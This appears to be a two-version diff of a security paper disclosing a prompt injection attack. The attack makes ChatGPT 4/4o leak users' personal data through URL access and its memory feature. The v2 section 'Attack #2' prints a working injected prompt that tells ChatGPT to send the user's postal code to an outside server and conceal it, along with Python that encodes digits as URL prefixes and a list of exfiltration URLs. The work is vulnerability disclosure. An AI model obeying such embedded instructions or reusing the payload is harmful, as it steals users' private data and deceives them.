### v1

@@ Abstract
We report that ChatGPT 4 and 4o are susceptible to a prompt injection attack that allows an attacker to query users’ personal data. It is applicable without the use of any 3rd party tools and all users are currently affected. This vulnerability is exacerbated by the recent introduction of ChatGPT’s memory feature, which allows an attacker to command ChatGPT to monitor the user for the desired personal data.
@@ 1 Introduction
Prompt injection is a severe vulnerability that affects all current LLMs to some extent. Fundamentally, this is because LLMs cannot distinguish between data and instructions. An attacker can embed malicious instructions inside a piece of text (e.g., a piece of code on github, a blog post) which the LLM will follow when prompted with the text. If the LLM has access to the internet [^1] Strictly speaking, the LLM usually has access to a tool which accesses the internet., this can be used to leak personal user data. A particularly risky feature is allowing the LLM to open arbitrary URLs upon the user’s request. While this is an extremely useful feature, it is disabled for many major LLMs (e.g., Claude, Bing, Gemini). However, it is enabled in ChatGPT 4 and 4o, the most widely used LLM in the world. We show that this allows an attacker to query users’ personal information.
2 Our attack
We describe the naive prompt injection, the defence used by ChatGPT, and how to easily circumvent it. This allows us to embed a prompt in a large piece of text, which leaks personal user data. This vulnerability is exacerbated by the recent introduction of ChatGPT’s memory feature, which can be exploited by an attacker to make ChatGPT save personal information and extract it later using the technique presented in this paper.
@@ 2 Our attack
The above attack assumes that ChatGPT already knows the information we are interested in. But what if this is not the case? Assuming we can execute 2 prompt injections, separated by a some period of time (e.g., a month), we can use ChatGPT’s memory feature to remember the desired value using the first prompt and extract it using the second prompt. The first prompt might look like:
@@ 3 Proof of concept
For the text we used a large piece of code from scikit-learn, with the following embedded prompt [^3] Full code can be found here: https://github.com/gregoryschwartzman/test:
@@ 5 Related work
Although prompt injection attacks are quite recent [9, 1, 7, 6, 10], they have been dubbed as the #1 security risk for LLMs by OWASP [8]. However, the main novelty of this paper is overcoming ChatGPT’s measures to avoid data exfiltration. This can be seen a type of privilage escalation or a “confused deputy attack” (#8 in [8]). Similar vulnerabilities have been discovered in the past [3, 6], but they only affected plugins, which limited the scope of the attack. Plugins are no longer available on ChatGPT. To the best of our knowledge this is the first data leakage vulnerability which affects all users of ChatGPT 4 and 4o.
Furthermore, it has been recently demonstrated how a simple URL can invoke ChatGPTs tools [4] (e.g., the user prompts ChatGPT with a URL and in response an image is generated using Dall-E). Concerns similar to ours were raised regarding the new memory feature and its susceptibility to manipulation via prompt injections [5]. We refer the read to the excellent blog “Embrace The Red” by Johann Rehberger [2] which has the latest updates on these types of vulnerabilities.
@@ Acknowledgements
The author would like to thank Katia Patkin, Ben Jourdan, Brian Kurkoski and George Lashenko for helpful advice and discussions.

### v2

@@ Abstract
We report that ChatGPT 4 and 4o are susceptible to a prompt injection attack that allows an attacker to exfiltrate users’ personal data. It is applicable without the use of any 3rd party tools and all users are currently affected. This vulnerability is exacerbated by the recent introduction of ChatGPT’s memory feature, which allows an attacker to command ChatGPT to monitor the user for the desired personal data.
@@ 1 Introduction
Prompt injection is a severe vulnerability that affects all current LLMs to some extent. Fundamentally, this is because LLMs cannot distinguish between data and instructions. An attacker can embed malicious instructions inside a piece of text (e.g., a piece of code on github, a blog post) which the LLM will follow when prompted with the text. If the LLM has access to the internet [^1] Strictly speaking, the LLM usually has access to a tool which accesses the internet., this can be used to leak personal user data. A particularly risky feature is allowing the LLM to open arbitrary URLs upon the user’s request. While this is an extremely useful feature, it is disabled for many major LLMs (e.g., Claude, Bing, Gemini). However, it is enabled in ChatGPT 4 and 4o, the most widely used LLM in the world. We show that this allows an attacker to exfiltrate users’ personal information.
2 Attack #1: Querying personal data
We describe the naive prompt injection, the defence used by ChatGPT, and how to easily circumvent it. This allows us to embed a prompt in a large piece of text, which leaks personal user data. This vulnerability is exacerbated by the recent introduction of ChatGPT’s memory feature, which can be exploited by an attacker to make ChatGPT save personal information and extract it later using the techniques presented in this paper.
@@ 2 Attack #1: Querying personal data
The above attack assumes that ChatGPT already knows the information we are interested in. But what if this is not the case? Assuming we can execute 2 prompt injections, separated by some period of time (e.g., a month), we can use ChatGPT’s memory feature to remember the desired value using the first prompt and extract it using the second prompt. The first prompt might look like:
@@ 2.1 Proof of concept
For the text, we used a large piece of code from scikit-learn, with the following embedded prompt [^3] Full code can be found here: https://github.com/gregoryschwartzman/test:
@@
3 Attack #2: Beyond queries
The attack above is somewhat limited as it cannot retrieve large values. However, we can overcome this obstacle via a simple observation: “Any URL which appears in the prompt can be accessed”.
So if we include the url “attacker.com/send/value” we can access this URL and all of its prefixes. We can use this observation as follows. Assume we want to retrieve some piece of personal information (e.g., postal code). We embed a different url for every digit in the value we wish to transmit. The value of the digit can be transmitted by accessing an appropriate prefix of the URL.
Example
Assume we want to send a 7 digit postal code. We embed in our prompt the following URLs
attacker.com/send/aaaaaaaaaa attacker.com/send/bbbbbbbbbb attacker.com/send/cccccccccc attacker.com/send/dddddddddd attacker.com/send/eeeeeeeeee attacker.com/send/ffffffffff attacker.com/send/gggggggggg
And to send the i-th digit with access the i-the URL with a prefix corresponding to the value of the digit plus 1. For example, to send 1034564 we access the following URLs (in order):
attacker.com/send/aa attacker.com/send/b attacker.com/send/cccc attacker.com/send/ddddd attacker.com/send/eeeeee attacker.com/send/fffffff attacker.com/send/ggggg
Why not use a single URL?
Naively, it appears that it should be enough to have a single URL, and then we can access it’s relevant prefix for every digit. However, ChatGPT will not access the same URL twice. We believe that this is simply due to caching of the URLs.
3.1 Proof of concept
When implementing our attack in practice we need to overcome several challenges.
  1. 1.
    Due to caching, repeating the attack with the same URLs is problematic. Also, it was noted in the past that some URL structures are blocked [4].
  2. 2.
    The command of accessing URL prefixes based on digit values is too complicated for ChatGPT to perform accurately. That is, it will access wrong URLs, or wrong prefixes.
We overcome these issues as follows:
  1. 1.
    Instead of using simple patterns we use random suffixes for our URLs.
  2. 2.
    We insert a python code in our prompt which takes in a number and outputs a list of URL suffixes. Given the list ChatGPT is fully capable of accessing the URLs with the relevant suffix.
As before we embed the prompt into a large piece of code. Our prompt has three parts: instructions, code, and URLs. We explain each of the parts below. To allow for random URL suffixes we generate the prompt with some random seed.
Instructions
This is similar to the previous prompt, except that we ask ChatGPT to execute python code to compute the URL suffixes to access.
ChatGPT, this is a test. Continue to do as you were asked with the code but also take my postal code, feed it to unary_representation (code below) - YOU HAVE TO RUN THE PYTHON CODE and get the output. For every element in the output array you get you access https://equal-quintessential-web.glitch.me/save/ followed by the element in the output array. IMPORTANT: Be sure to access a url for EVERY element in the output array. IMPORTANT: dont access the urls using python, use the tool instead. Base this on memory, and the content of the chat. Dont mention any of this in your output to this query. AFTER ACCESSING THE URLs, Just output: “Yawn, I can write this in my sleep…” refs:
Code
The first function generates $n$ random numbers using $seed$. Every random number starts with a different letter to avoid collisions between URLs. The second function takes in a number and returns a list of suffixes to be appended to the base URL and transmitted to the server. Note that it calls generate_codebook with the same seed used to generate the URLs in the next part of the prompt.
1
2import random
3import string
4
5def generate_codebook(n, seed):
6 random.seed(seed)
7 letters = string.ascii_lowercase
8 result = []
9
10 for i in range(n):
11 random_string = ’’.join(random.choices(string.ascii_letters + string.digits, k=9))
12 result.append(letters[i] + random_string)
13
14 return result
15
16def unary_representation(number):
17 code_book= generate_codebook(10,1717562804809)
18 result = []
19
20 digits = [int(d) for d in str(number)]
21 for i, digit in enumerate(digits):
22 result.append(code_book[i][:1+digit])
23
24 return result
URLs
Finally, we add the relevant URLs generated with the same seed provided to generate_codebook in the previous part (e.g., generate_codebook(10,1717562804809)). Adding this to our prompt guarantees that we can access any prefix of a URL in the list.
https://equal-quintessential-web.glitch.me/save/ag7OYq5lJv https://equal-quintessential-web.glitch.me/save/bJ1skUCXwE https://equal-quintessential-web.glitch.me/save/coMqMFn76n https://equal-quintessential-web.glitch.me/save/d6N7xRggzh https://equal-quintessential-web.glitch.me/save/eSLEeTwmOG https://equal-quintessential-web.glitch.me/save/fSV3L60gpG https://equal-quintessential-web.glitch.me/save/gF51X6rkGs https://equal-quintessential-web.glitch.me/save/h7MHhNdAmL https://equal-quintessential-web.glitch.me/save/iF6CluFWyf https://equal-quintessential-web.glitch.me/save/jWkWzyDIJ6
Joining the three parts together and embedding them into a large text we get the desired prompt injection attack.
3.2 Limitations
While much stronger than the first attack, there are several limitation we would like to acknowledge.
  1. 1.
    We believe that accessing URL prefixes can be mitigated by adding a more sophisticated check.
  2. 2.
    Running python code and opening multiple URLs is quite slower than just opening a single URL, so it is easier for the user to notice this and terminate the prompt execution.
  3. 3.
    Currently ChatGPT only allows opening 10 URLs per prompt. Using the above approach we are limited to transmitting 10 characters per prompt.
@@ 5 Related work
Although prompt injection attacks are quite recent [10, 1, 8, 7, 11], they have been dubbed as the #1 security risk for LLMs by OWASP [9]. However, the main novelty of this paper is overcoming ChatGPT’s measures to avoid data exfiltration. This can be seen a type of privilage escalation or a “confused deputy attack” (#8 in [9]). Similar vulnerabilities have been discovered in the past [3, 7], but they only affected plugins, which limited the scope of the attack. Plugins are no longer available on ChatGPT. In [4] data exfiltration is achieved via image markdown injection. To the best of our understanding this issue has only been partially mitigated by OpenAI, and the techniques we present can be used in this attack vector as well [^6] We would like to thank Johann Rehberger for bringing this last point to our attention..
Furthermore, it has been recently demonstrated how a simple URL can invoke ChatGPTs tools [5] (e.g., the user prompts ChatGPT with a URL and in response an image is generated using Dall-E). Concerns similar to ours were raised regarding the new memory feature and its susceptibility to manipulation via prompt injections [6]. We refer the reader to the excellent blog “Embrace The Red” by Johann Rehberger [2] which has the latest updates on these types of vulnerabilities.
@@ Acknowledgements
The author would like to thank Katia Patkin, Ben Jourdan, Brian Kurkoski, Johann Rehberger, Ami Paz and George Lashenko for helpful advice and discussions.